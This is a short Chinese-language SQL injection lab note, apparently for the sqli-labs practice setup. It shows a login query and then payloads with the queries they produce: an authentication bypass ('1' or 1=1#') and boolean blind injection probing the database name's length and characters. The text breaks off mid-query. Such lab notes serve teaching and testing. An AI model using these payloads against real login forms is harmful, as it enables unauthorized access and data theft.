后台代码:
SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1
输入账号:Dumb 密码:Dumb2
SELECT username, password FROM users WHERE username='Dumb' and password='Dumb2' LIMIT 0,1
绕过登录:
输入账号:aaa 密码:1' or 1=1#
SELECT username, password FROM users WHERE username='aaa' and password='1' or 1=1#' LIMIT 0,1
Sql注入1:盲注
输入账号:Dumb 密码:Dumb' and length(database())=8#
SELECT username, password FROM users WHERE username='Dumb' and password='Dumb' and length(database())=8#' LIMIT 0,1
security
输入账号:Dumb 密码:Dumb' and ascii(substr(database(),1,1))=115#
SELECT username, password FROM users WHERE username='Dumb' and password='Dum